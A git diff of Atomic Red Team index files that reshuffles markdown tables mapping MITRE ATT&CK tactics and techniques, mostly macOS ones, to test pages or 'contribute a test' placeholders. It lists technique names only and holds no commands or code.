-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Screen Capture](../../T1113/T1113.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -60,5 +60,6 @@
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 5c681900..a4b8e7ab 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -1,102 +1,112 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
